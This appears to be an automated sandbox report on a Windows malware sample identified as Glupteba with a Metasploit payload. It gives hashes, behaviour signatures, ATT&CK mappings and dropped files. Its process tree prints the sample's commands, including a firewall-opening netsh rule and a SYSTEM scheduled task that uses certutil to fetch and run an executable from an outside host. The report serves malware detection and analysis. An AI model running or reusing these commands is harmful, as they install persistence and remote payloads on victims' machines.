Analysis

  • max time kernel
    153s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    29-01-2023 18:32

General

  • Target

    b5c96182c0205792e006ee86482650eb7098caba9b753800a796879af113aa0e.exe

  • Size

    3.8MB

  • MD5

    bf8bd00031a3a08e4e62dbfff08b9bfa

  • SHA1

    1f1264370e6b86999998dd99596de4010a283c31

  • SHA256

    b5c96182c0205792e006ee86482650eb7098caba9b753800a796879af113aa0e

  • SHA512

    f25e70666ff8c0bce67e6f400386d69a125c2eb5eac98f0b4a69a8909042cc50d0335293e3093e2350b710ea0b275a9b7a852eac471371568d0fb368c3cbb2a5

  • SSDEEP

    98304:WyfDgsCeWlw817dwOUCXuiwMU6Fnit62T4IQIXS5:WKDgdaAdfXuilbit6c4tIi5

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 10 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 10 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b5c96182c0205792e006ee86482650eb7098caba9b753800a796879af113aa0e.exe
    "C:\Users\Admin\AppData\Local\Temp\b5c96182c0205792e006ee86482650eb7098caba9b753800a796879af113aa0e.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:964
    • C:\Users\Admin\AppData\Local\Temp\b5c96182c0205792e006ee86482650eb7098caba9b753800a796879af113aa0e.exe
      "C:\Users\Admin\AppData\Local\Temp\b5c96182c0205792e006ee86482650eb7098caba9b753800a796879af113aa0e.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1404
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1680
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:1656
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe /15-15
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        PID:1744
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1632
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:452
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2044
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230129193312.log C:\Windows\Logs\CBS\CbsPersist_20230129193312.cab
    1⤵
    • Drops file in Windows directory
    PID:1304

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Disabling Security Tools

2
T1089

Modify Registry

4
T1112

Install Root Certificate

1
T1130

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    Filesize

    3.8MB

    MD5

    bf8bd00031a3a08e4e62dbfff08b9bfa

    SHA1

    1f1264370e6b86999998dd99596de4010a283c31

    SHA256

    b5c96182c0205792e006ee86482650eb7098caba9b753800a796879af113aa0e

    SHA512

    f25e70666ff8c0bce67e6f400386d69a125c2eb5eac98f0b4a69a8909042cc50d0335293e3093e2350b710ea0b275a9b7a852eac471371568d0fb368c3cbb2a5

  • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • \Users\Admin\AppData\Local\Temp\dbghelp.dll
    Filesize

    1.5MB

    MD5

    f0616fa8bc54ece07e3107057f74e4db

    SHA1

    b33995c4f9a004b7d806c4bb36040ee844781fca

    SHA256

    6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

    SHA512

    15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

  • \Users\Admin\AppData\Local\Temp\symsrv.dll
    Filesize

    163KB

    MD5

    5c399d34d8dc01741269ff1f1aca7554

    SHA1

    e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

    SHA256

    e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

    SHA512

    8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

  • \Windows\rss\csrss.exe
    Filesize

    3.8MB

    MD5

    bf8bd00031a3a08e4e62dbfff08b9bfa

    SHA1

    1f1264370e6b86999998dd99596de4010a283c31

    SHA256

    b5c96182c0205792e006ee86482650eb7098caba9b753800a796879af113aa0e

    SHA512

    f25e70666ff8c0bce67e6f400386d69a125c2eb5eac98f0b4a69a8909042cc50d0335293e3093e2350b710ea0b275a9b7a852eac471371568d0fb368c3cbb2a5

  • \Windows\rss\csrss.exe
    Filesize

    3.8MB

    MD5

    bf8bd00031a3a08e4e62dbfff08b9bfa

    SHA1

    1f1264370e6b86999998dd99596de4010a283c31

    SHA256

    b5c96182c0205792e006ee86482650eb7098caba9b753800a796879af113aa0e

    SHA512

    f25e70666ff8c0bce67e6f400386d69a125c2eb5eac98f0b4a69a8909042cc50d0335293e3093e2350b710ea0b275a9b7a852eac471371568d0fb368c3cbb2a5

  • memory/964-59-0x0000000000400000-0x0000000000C24000-memory.dmp
    Filesize

    8.1MB

  • memory/964-58-0x0000000000400000-0x0000000000C24000-memory.dmp
    Filesize

    8.1MB

  • memory/964-54-0x00000000025A0000-0x0000000002947000-memory.dmp
    Filesize

    3.7MB

  • memory/964-57-0x0000000000400000-0x0000000000C24000-memory.dmp
    Filesize

    8.1MB

  • memory/964-56-0x0000000002950000-0x0000000003152000-memory.dmp
    Filesize

    8.0MB

  • memory/964-55-0x00000000025A0000-0x0000000002947000-memory.dmp
    Filesize

    3.7MB

  • memory/1404-61-0x00000000025E0000-0x0000000002987000-memory.dmp
    Filesize

    3.7MB

  • memory/1404-65-0x0000000000400000-0x0000000000C24000-memory.dmp
    Filesize

    8.1MB

  • memory/1404-70-0x0000000000400000-0x0000000000C24000-memory.dmp
    Filesize

    8.1MB

  • memory/1404-60-0x00000000025E0000-0x0000000002987000-memory.dmp
    Filesize

    3.7MB

  • memory/1656-64-0x000007FEFBDF1000-0x000007FEFBDF3000-memory.dmp
    Filesize

    8KB

  • memory/1656-63-0x0000000000000000-mapping.dmp
  • memory/1680-62-0x0000000000000000-mapping.dmp
  • memory/1744-71-0x00000000026E0000-0x0000000002A87000-memory.dmp
    Filesize

    3.7MB

  • memory/1744-75-0x0000000000400000-0x0000000000C24000-memory.dmp
    Filesize

    8.1MB

  • memory/1744-74-0x0000000000400000-0x0000000000C24000-memory.dmp
    Filesize

    8.1MB

  • memory/1744-73-0x0000000002A90000-0x0000000003292000-memory.dmp
    Filesize

    8.0MB

  • memory/1744-72-0x00000000026E0000-0x0000000002A87000-memory.dmp
    Filesize

    3.7MB

  • memory/1744-68-0x0000000000000000-mapping.dmp
  • memory/2044-78-0x0000000140000000-0x00000001405E8000-memory.dmp
    Filesize

    5.9MB

  • memory/2044-79-0x0000000140000000-0x00000001405E8000-memory.dmp
    Filesize

    5.9MB